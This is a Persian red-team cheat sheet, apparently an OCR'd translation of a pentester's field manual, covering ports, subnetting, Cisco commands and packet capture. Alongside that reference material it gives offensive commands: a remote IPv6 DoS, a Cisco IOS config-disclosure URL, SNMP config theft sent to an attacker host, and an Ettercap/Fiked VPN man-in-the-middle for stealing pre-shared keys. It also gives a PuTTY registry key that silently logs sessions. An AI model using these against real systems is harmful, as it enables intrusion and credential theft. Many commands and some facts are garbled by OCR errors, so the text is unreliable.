تیم قرمز

برگه رمز هایی برای نفوذگران

سرآغاز لینوکس ویندوز شبکه نکات و ترفند ها روش کار با ابزار ها وب پایگاه داده ها برنامه نویسی بی سیم منابع

شبکه

پورت های متداول

شماره سرویس
21 FTP
22 SSH
23 Tel net
25 SMTP
49 TACACS
53 DNS
67/8 DHCP (UDP)
69 TFTP (UDP)
80 HTTP
88 Kerberos
110 POP3
111 RPC
123 NTP (UDP)
135 Windows RPC
137 NetBIOS
138 NetBIOS
139 SMB
143 IMAP
161 SNMP (UDP)
179 BGP
201 AppleTalk
389 LDAP
443 HTTPS
445 SMB
500 ISAKMP (UDP)
514 Syslog
520 RIP
546/7 DHCPv6
587 SMTP
902 VMWare
1080 Socks Proxy
1194 VPN
1433/4 MS-SQL
1521 Oracle
1629 DarneWare
2049 NFS
3128 Squid Proxy
3306 MySQL
3389 RDP
5060 SIP
5222 Jabber
5432 Postgres
5666 Nagios
5900 VNC
6000 X11
6129 DameWare
6667 IRC
9001 Tor
9001 HSQL
9090/1 Open fire
9100 Jet Direct

دریافت اطلاعات سیستم عامل با TTL

os size
Windows 128
Linux 64
Network 255
Solaris 255

اطلاعات IPV4

محدوده Classful

name start end
A 0.0.0.0 127.255.255.255
B 128.0.0.0 191.255.255.255
C 192.0.0.0 223.255.255.255
D 224.0.0.0 239.255.255.255
E 240.0.0.0 255.255.255.255

محدوده Reversed

start end
10.0.0.0 10.255.255.255
127.0.0.0 127.255.255.255
172.16.0.0 172.31.255.255
192.168.0.0 192.168.255.255

Subnetting

     
/31 255.255.255.254 1 Host
/30 255.255.255.252 2 Hosts
/29 255.255.255.248 6 Hosts
/28 255.255.255.240 14 Hosts
/27 255.255.255.224 30 Hosts
/26 255.255.255.192 62 Hosts
/25 255.255.255.128 126 Hosts
/24 255.255.255.0 254 Hosts
/23 255.255.254.0 510 Hosts
/22 255.255.252.0 1022 Hosts
/21 255.255.248.0 2046 Hosts
/20 255.255.240.0 4096 Hosts
/19 255.255.224.0 8190 Hosts
/18 255.255.192.0 16382 Hosts
/17 255.255.128.0 32766 Hosts
/16 255.255.0.0 65534 Hosts
/15 255.254.0.0 131070 Hosts
/14 255.252.0.0 262142 Hosts
/13 255.248.0.0 524286 Hosts
/12 255.240.0.0 1048574 Hosts
/11 255.224.0.0 2097150 Host
/10 255.192.0.0 4194302 Host
/9 255.128.0.0 8388606 Host
/8 255.0.0.0 16777214 Hosts

محاسبه محدوده subnet

Given: 1.1.1.101/28
/28 = 255.255.255.240 netmask
256 - 240 = 16 = subnet ranges of 16, i.e.
    1.1.1.0
    1.1.1.16
    1.1.1.32 ...
Range where given IP falls: 1.1.1.96 - 1.1.1.111

اطلاعات IPV6

آدرس های Broadcast

ff02::1 - link-local nodes
ff05::1 - site-local nodes
ff01::2 - node-local routers
ff02::2 - link-local routers
ff05::2 - site-local routers

آدرس های Interface

fe80:: -link-local
2001:: - routable
::a.b.c.d- IPv4 compatible IPv6
::ffff:a.b.c.d- IPv4 mapped IPv6

جعبه ابزار ipv6

Remote Network DoS:
rsumrf6 eth# remote ipv6

تونل ipv6 در ipv4 با socat

socat TCP-LISTEN:8080,reuseaddr,fork TCP6:[2001::]:80
./nikto.pl -host 12-.0.0.1 -port 8080

دستورات سیسکو

دستور توضیح
enable فعال سازی حالت privilege
#configure terminal تنظیمات interface
(config)#interface fa0/0 تنظیم FastEthernet 0/0
(config-if)#ip addr 1.1.1.1 255.255.255.0 تنظیم IP به fa0/0
(config)#line Vty 0 4 تنظیم خط vty
(config-line)#login

Set telnet password

(config-line)#password password تنظیم کلمه عبور برای telnet
#show session بازنمودن جلسه
#show version نسخه IOS
#dir file systems فایل های موجود
#dir all-filesystems اطلاعات فایل
#dir /all حذف فایل ها
#show running-config تنظیمات داخل memory
#show startup-config تنظیمات داخل boot
#show ip interface brief لیست Interfaces
#show interface e0 جزییات اطلاعات interface
#show ip route لیست Route ها
#show access-lists لیست های دسترسی
#terminal length 0 هیچ محدودی در خروجی نباشد
#copy running-config startup-config جایگذاری تنظیمات از memory به boot
#copy running-config tftp کپی از تنظمیات بر روی tftp

آسیب پذیری های IOS 11.2-12.2

http:// ip /level/ 16-99 /exec/show/config

پروتکل SNMP

نیاز به شروع سرویس tftp

./snmpblow.pl -s srcip -d rtr_ip -t attackerip -f out.txt
snmpstrings.txt

لیست سرویس های اجرایی ویندوز

snrnpwalk -c public -v1 ip 1 | grep hrSWRJnName | cut -d" " -f4

پورت های باز ویندوز

smpwalk | grep tcpConnState | cut -d" " -f6 | sort -u

نرم افزار های نصب شده

smpwalk | grep hrSWinstalledName

کاربران ویندوز

snmpwalk ip 1.3 | grep 77.1.2.25 -f4

ضبط Packet

ضبط بسته های پورت 22- 23

tcpdump -nvvX -sO -i eth0 tcp portrange 22-23

ضبط ترافیک ip خاص به غیر از subnet

tcpdump -I eth0 -tttt dst ip and not net 1.1.1.0/24

ضبط ترافیک 192.1

tcpdump net 192.1.1

ضبط زمان بندی شده ترافیک

dumpcap -I eth0 -a duration: sec -w file file.pcap

بررسی Reply PCAP

file2cable -i eth0 -f file.pcap

بررسی Reply packets (FUZZ | Dos)

tcpreplay --topspeed --loop=O --intf=eth0 .pcap_file_to replay rnbps=10|100|1000

دستور DNSRecon

Reverse lookup for IP range:
./dnsrecon.rb -t rvs -i 192.1.1.1,192.1.1.20
Retrieve standard DNS records:
./dnsrecon.rb -t std -d domain.corn
Enumerate subdornains:
./dnsrecon.rb -t brt -d domain.corn -w hosts.txt
DNS zone transfer:
./dnsrecon -d domain.corn -t axfr

عملیات reverse dns lookup و بررسی خروجی با nmap

nmap -R -sL -Pn -dns-servers dns svr ip range | awk '{if( ($1" "$2"
"$3)=="Nmap scan report")print$5" "$6}' | sed 's/(//g' I sed 's/)//g'
dns.txt

VPN

نوشتن psk بر روی فایل

ike-scan -M -A vpn ip -P file

حمله به سرور vpn

ike-scan -A -t 1 --sourceip= spoof ip dst ip

Fiked - ایجاد سرور vpn تقلبی

Must know the VPN group name a~d pre-shared key;
1. Ettercap filter to drop IPSEC traffic (UDP port 500)
   if(ip.proto == UDP && udp.scc == 500) {
      kill();
      drop();
      msg (" UDP packet dropped ") ;
2. Compile filter
   etterfilter udpdrop.filter -o udpdrop.ef
3. Start Ettercap and drop all IPSEC ~raffic
   #ettercap -T -g -M arp -F udpdrop.ef // //
4. Enable IP Forward
   echo "1" /proc/sys/net/ipv4/ip_forward
5. Configure IPtables to port forward to Fiked server
    iptables -t nat -A PREROUTING -p udp -I eth0 -d VPN Server IP -j
   DNAT - - to Attacking Host IP
    iptables -P FORWARD ACCEP~
6. Start Fiked to impersonate the VPN Server
   fiked - g vpn gatewa; ip - k VPN Group Name:Group Pre-Shared Ke;
7. Stop Ettercap
8. Restart Ettercap without the filter
   ettercap -T -M arp II II

نرم افزار Putty

کلید رجیستری برای گزارش گیری از هر عملیاتی توسط putty (حتی دستورات و خروجی ها)

[HKEY_CURRENT_USER\Software\Si~onTatham\Putt;\Sessions\Default%20Settings]
"LogFileName"="%TEMP%\putty.dat"
"LogType"=dword:00000002"